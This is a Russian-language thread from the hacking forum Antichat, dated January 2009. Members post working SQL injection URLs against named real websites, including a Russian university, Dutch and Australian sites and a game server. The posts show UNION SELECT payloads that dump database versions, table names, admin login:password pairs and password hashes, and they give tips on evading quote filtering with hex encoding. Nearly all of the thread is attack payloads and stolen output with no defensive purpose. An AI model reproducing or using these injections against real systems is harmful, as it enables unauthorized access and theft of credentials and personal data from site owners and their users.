Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
 |
|
08.01.2009, 03:51
|
|
Познающий
Регистрация: 06.11.2008
Сообщений: 32
Провел на форуме:
934986
Репутация:
21
|
|
Как можно посмотреть что выдало при такой скуле. Просто на экране ни че не видо или я не вижу -(
На скока если я знаю инъекция вслепую то некак
|
|
|
08.01.2009, 04:09
|
|
Постоянный
Регистрация: 16.03.2007
Сообщений: 380
Провел на форуме:
1404552
Репутация:
568
|
|
Aedes.com - PR 4 ~1к
http://www.aedes.com/brand.php?cat_id=-3+union+select+1,2,unhex(hex(version()))--
Northcoast101.com - PR 4 ~1к
http://www.northcoast101.com/menus/index.php?cat_id=-17+union+select+unhex(hex(version()))/*
4 ветка
http://www.northcoast101.com/menus/index.php?cat_id=-17+union+select+unhex(hex(concat_ws(0x3a,name,pass word,email)))+from+LUM_User/*
/admin
Dsmi.tobw.net - PR 4 ~1к
http://dsmi.tobw.net/index.php?cat_id=1+union+select+1,2,3,4+limit+0,1/*
(
Nlstar.com - PR 3 ~0.7к
http://www.nlstar.com/catalog/index.php?cat_id=00000017|%'+union+select+1,2,vers ion(),4/*
еще какойто..
Последний раз редактировалось sabe; 08.01.2009 в 06:28..
|
|
|
|
08.01.2009, 04:11
|
|
Постоянный
Регистрация: 27.10.2008
Сообщений: 491
Провел на форуме:
4002393
Репутация:
464
|
|
http://www.tspu.edu.ru/?ur=-284+union+select+1,version(),3,4,5,6,7,8,9,10,11,1 2,13,14,15--
версия 5.0.70-log
[QUOTE]http://www.tspu.edu.ru/?ur=-284+union+select+1,table_name,3,4,5,6,7,8,9,10,11, 12,13,14,15+from+INFORMATION_SCHEMA.TABLES--
http://www.tspu.edu.ru/?ur=-284+union+select+1,concat(login,0x3a,password),3,4 ,5,6,7,8,9,10,11,12,13,14,15+from+administrtion--[QUOTE]
логин:пасс админов
http://tspu.edu.ru/admins/ админка
Последний раз редактировалось zifanchuck; 08.01.2009 в 04:19..
|
|
|
|
08.01.2009, 04:15
|
|
Познающий
Регистрация: 06.11.2008
Сообщений: 32
Провел на форуме:
934986
Репутация:
21
|
|
Assembler
там нету уязвимости
|
|
|
|
08.01.2009, 04:33
|
|
Познающий
Регистрация: 05.08.2007
Сообщений: 30
Провел на форуме:
242062
Репутация:
18
|
|
Сообщение от Merl00k
Assembler
там нету уязвимости
Код:
http://wow.cybergame.su/index.php?newsid=-1+union+select+1,2,3,4,5,6+from+information_schema.tables--
судя по отсутствии ошибки при запросе к information_schema, версия там пятая, но вывода что-то не замечаю...
|
|
|
|
08.01.2009, 04:44
|
|
Познающий
Регистрация: 06.11.2008
Сообщений: 32
Провел на форуме:
934986
Репутация:
21
|
|
sharoff
а ты уверен что там есть бага ?
|
|
|
|
08.01.2009, 05:00
|
|
Участник форума
Регистрация: 17.09.2008
Сообщений: 211
Провел на форуме:
1571865
Репутация:
571
|
|
Сообщение от Merl00k
sharoff
а ты уверен что там есть бага ?
Код:
http://wow.cybergame.su/index.php?newsid=-1+union+select+1,2,3,4,5--
Выдает: The used SELECT statements have a different number of columns
Код:
http://wow.cybergame.su/index.php?newsid=-1+union+select+1,2,3,4,5,6--
Ошибка исчезла.
Итог:
6 стоблоцов, вывода нет.
ЗЫ: В этой теме выкладывать инъект, а вопросы - в соседней.
|
|
|
|
08.01.2009, 05:11
|
|
Участник форума
Регистрация: 01.09.2007
Сообщений: 203
Провел на форуме:
812964
Репутация:
302
|
|
Код:
http://wow.cybergame.su/index.php?newsid=-25+union+select+1,2,3,column_name,5,6+from+informa tion_schema.columns+where+table_name='account'--
И опять что то не то. |
|
|
|
08.01.2009, 05:19
|
|
Познающий
Регистрация: 05.08.2007
Сообщений: 30
Провел на форуме:
242062
Репутация:
18
|
|
Сообщение от Assembler
Код:
http://wow.cybergame.su/index.php?newsid=-25+union+select+1,2,3,column_name,5,6+from+informa tion_schema.columns+where+table_name='account'--
И опять что то не то.
Код:
http://wow.cybergame.su/index.php?newsid=-25+union+select+1,2,3,column_name,5,6+from+information_schema.columns+where+table_name=0x6163636f756e74--
Там стоит фильтрация кавычек, пользуемся hex
0x6163636f756e74 представляет собой запись account
Еще раз повторяю, вывода там нету, никакой column_name ты не увидишь.
Последний раз редактировалось sharoff; 08.01.2009 в 05:21..
|
|
|
|
08.01.2009, 11:50
|
|
Постоянный
Регистрация: 20.11.2008
Сообщений: 406
Провел на форуме:
2358980
Репутация:
930
|
|
Код:
http://www.winlinanswers.com/book/resources.php?id=8'+union+select+1,concat(user(),0x3a,version(),0x3a,database()),3,4,5 ,6,7,8,9,10,11/*
user(): jeremym@localhost
version(): 4.1.22
database(): MOSKOWITZ
PR: 6
Код:
http://www.admanager.nl/online/page.php?id=-8+union+select+1,concat(user(),0x3a,version(),0x3a,database()),3,4--
user(): admanager@toscane.eid.nl
version(): 4.1.22
database(): admanager
PR: 5
Код:
http://www.fhmbuurmeisje.nl/profile.php?id=-8+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,concat(user(),0x3a,ve rsion(),0x3a,database())--
user(): ttg-db@localhost
version(): 4.1.20-log
database(): ttg-fhm
PR: 3
Код:
http://www.pca.org.au/?id=-8+union+select+1,2,concat(user(),0x3a,version(),0x3a,database()),4,5,6,7,8,9,10,11,12--
user(): mypca1005@ws-shared-9.private.netregistry.net
version(): 5.0.32-Debian_7etch6-log
database(): pca_pca_org_au
PR: 5
нашёл таблицу tblmemberlogin, в ней одно поле "txtPassword"
в таблице всего два хэша:
b334044a3535f437c14f24c1e76ae3fb
5f4dcc3b5aa765d61d8327deb882cf99: password
логина нет (толком не искал) |
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
